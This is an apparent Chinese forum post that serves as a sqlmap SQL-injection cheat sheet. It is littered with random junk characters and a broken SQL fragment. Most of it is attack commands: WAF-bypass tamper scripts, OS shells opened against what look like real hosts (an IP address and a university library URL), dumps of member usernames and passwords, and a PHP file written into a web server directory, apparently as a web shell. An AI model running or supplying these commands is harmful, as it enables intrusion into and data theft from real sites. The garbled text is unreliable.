sqlmap使用实例

admin

/pentest/database/sqlmap

update :::::>     in the folder   after  execute    following   order : svn update

# N, M% y8 j" M+ Asqlmap.py -r 1.txt --current-db
& i" B- \; b- F7 Y% E" X. C
7 Q7 f2 d. Q2 f: v0 U" c5 Yv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

1 X9 X! e9 H" {5 Q==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
, g; @5 Y. d* n: l# I# e" i猜解数据库
./sqlmap.py -u "injection-url" --dbs
# J8 U1 c# A0 R3 a7 a1 `sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
0 j7 \8 Q0 c6 c( w) s& z
猜解表名
./sqlmap.py -u "injection-url" -D database_name --tables
- A* n# o4 j% P& E
! X( i" w" o+ O. x9 i( J- Wsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"

sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
7 n2 k: `4 Y6 O6 [. J7 Q
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
& a1 O2 R8 B% W4 }" v7 Ksqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
# [2 s1 O* d# v* }4 _7 vsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
" W) Y# {+ N4 ^3 H0 V1 \' q
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
$ u3 h. a6 w! e# N( y9 s: X$ esqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
3 k) D5 s3 H1 W* O8 @; bsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
# g2 d) s: D# J. y5 w# u+ }0 H
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
) O4 H% h1 b5 @+ h% [sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
& p/ l) h- D  N9 V! [
" X% d- i% ]# }3 F& n( u& z, s. Zsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
: v4 ?) h. a7 J( y& a猜解列名
6 I* {, c) r4 x3 h" B./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
2 d2 Y! _2 L) N$ `% R
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
9 j, T( ^* e' D4 O* ^& u
: V9 l: V' C5 I, ~" Vsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
&submit=Go
# \1 ^; U4 n  D' \# d: g" h猜解值
9 A7 v6 G  d) N1 a! v, D0 T6 O. k./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
========================================================
搜索表名中包括mana字符的
/sqlmap.py -u "injection-url" -T mana --search
) c% z' j# r; A# m返回一个交互式sql shell
/sqlmap.py -u "injection-url" --sql-shell
: X! \% K; ]5 o读取指定文件（需权限）
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
, u$ |4 }3 u( u  W9 Y. S* t查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
6 j  ~5 o; o8 b8 C% ~. x本地文件 写入 远程目标绝对路径
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
* [, h- S0 o+ ]/ d# B4 C
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
6 d3 ~' i9 {  Q3 s$ H6 R查看某用的权限
/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
读取所有数据库用户或指定数据库用户的密码
% z& ^, x$ R* [  I- T/ q6 Bsqlmap.py -r 1.txt --users --passwords
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
8 R% s, p4 y  T
/sqlmap.py -u "injection-url" --passwords -U root

--start&&--stop 与 --first&&--last 的区别
: d8 l8 ^+ Q& g% _" R( A, q2 n8 E4 r) @/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）
* q. j* V1 w; b( Q% o3 W
从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
; f$ O) y; [& h% ~/ s$ g* w
执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
: j- z7 w: t  l3 K0 H' E( m0 u/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"